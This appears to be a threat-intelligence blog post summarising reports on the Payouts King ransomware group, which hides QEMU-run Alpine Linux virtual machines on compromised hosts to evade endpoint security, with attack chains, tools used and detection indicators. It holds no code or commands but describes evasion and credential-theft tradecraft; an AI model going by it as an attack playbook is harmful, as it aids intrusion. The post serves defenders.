What if your antivirus couldn't see the ransomware running inside a virtual machine on your own computer?

On April 16, 2026, Sophos dropped a report that reads like a hacker's fever dream: a ransomware group is hiding entire virtual machines inside compromised systems, using a legitimate open-source emulator to create invisible fortresses that antivirus software can't penetrate.

The group is Payouts King — a new ransomware operation suspected to be built from former BlackBasta affiliates. Their trick? Abusing QEMU, the same virtualization tool developers use to test operating systems, to run hidden Linux VMs that host their entire attack toolkit.

Your EDR sees nothing. Your antivirus sees nothing. But inside that VM, attackers are harvesting credentials, exfiltrating data, and preparing to encrypt your entire network.

The Invisible Machine

QEMU is an open-source CPU emulator and hypervisor. It's legitimate, widely used, and rarely flagged by security tools. That's exactly why Payouts King chose it.

Sophos observed two distinct campaigns. In the first — tracked as STAC4713 — attackers:

  • Create a scheduled task named 'TPMProfiler' to launch QEMU as SYSTEM
  • Use virtual disk files disguised as benign databases and DLLs
  • Set up reverse SSH tunnels for covert remote access
  • Run Alpine Linux 3.22.0 inside the VM

Inside that Alpine VM, they deploy a full offensive toolkit: AdaptixC2, Chisel, BusyBox, and Rclone for data exfiltration.

The VM is invisible to host-based security because the endpoint protection monitors the Windows host — not what's running inside a virtualized environment. It's like installing a camera in someone's house but hiding it inside a mirror they never look behind.

The Attack Chain

Sophos traced the infection path across multiple incidents:

Initial Access:

  • Exposed SonicWall VPNs (earlier campaigns)
  • SolarWinds Web Help Desk vulnerability (CVE-2025-26399)
  • Exposed Cisco SSL VPNs
  • Microsoft Teams phishing — posing as IT staff and tricking employees into installing QuickAssist

Credential Harvesting:

  • Use vssuirun.exe (legitimate VSS tool) to create shadow copies
  • Copy NTDS.dit, SAM, and SYSTEM hives over SMB
  • Or sideload Havoc C2 via ADNotificationManager.exe
  • Exfiltrate data with Rclone to remote SFTP locations

Persistence & Evasion:

  • The QEMU VM provides long-term access even if the initial foothold is detected
  • All malicious activity runs inside the VM, leaving minimal traces on the host

Campaign #2: CitrixBleed 2 Exploitation

Sophos also tracked a second campaign — STAC3725 — active since February 2026. These attackers exploit CitrixBleed 2 (CVE-2025-5777) in NetScaler ADC/Gateway instances.

After breaching the NetScaler device, they:

  1. Deploy a ZIP archive with a malicious executable
  2. Install a service named 'AppMgmt'
  3. Create a local admin user: CtxAppVCOMService
  4. Install ScreenConnect for remote persistence
  5. Drop and extract a QEMU package
  6. Run a hidden Alpine Linux VM with a custom .qcow2 disk image

Inside this VM, they manually compile an entire attack arsenal: Impacket, KrbRelayx, Coercer, BloodHound.py, NetExec, Kerbrute, and Metasploit.

Observed activities include credential harvesting, Kerberos username enumeration, Active Directory reconnaissance, and staging data for FTP exfiltration.

Why This Matters

This isn't just another ransomware technique. It's a fundamental evasion strategy that exploits an architectural blind spot in endpoint security.

The problem: Most EDR and antivirus solutions monitor the host operating system. They can't see inside VMs running on that host — especially when those VMs are managed by a legitimate tool like QEMU that isn't inherently malicious.

The implications:

  • Attackers get a persistent, invisible command-and-control channel
  • Forensic analysis of the host reveals little — the evidence is inside the VM
  • Security teams may clear the initial infection while missing the QEMU backdoor entirely
  • The technique works against both Windows and Linux targets

Zscaler's analysis confirms Payouts King uses heavy obfuscation, anti-analysis mechanisms, and terminates security tools with low-level system calls. Their encryption scheme uses AES-256 (CTR) with RSA-4096 and intermittent encryption for larger files.

Detection Guidance

Sophos recommends hunting for these indicators:

  • Unauthorized QEMU installations on endpoints
  • Scheduled tasks running with SYSTEM privileges that launch virtualization software
  • Unusual SSH port forwarding or outbound SSH tunnels on non-standard ports
  • Suspicious virtual disk files (.qcow2, .vmdk, .vhd) in unusual locations
  • Alpine Linux VMs on Windows systems (especially in corporate environments)
  • Processes like qemu-system-x86_64.exe running without legitimate business justification

The Bigger Picture

Payouts King represents a new generation of ransomware operators who understand enterprise security architecture well enough to exploit its blind spots. By weaponizing legitimate virtualization tools, they're not just evading detection — they're creating a new category of threat that existing security stacks weren't designed to handle.

The question isn't whether more groups will adopt this technique. It's how long until they do.

Published: April 25, 2026
Sources: Sophos Threat Report (April 16, 2026), Zscaler ThreatLabz (April 2026), BleepingComputer

Tags: #ransomware #qemu #virtualization #edr-bypass #payouts-king #blackbasta #cybersecurity #threat-intelligence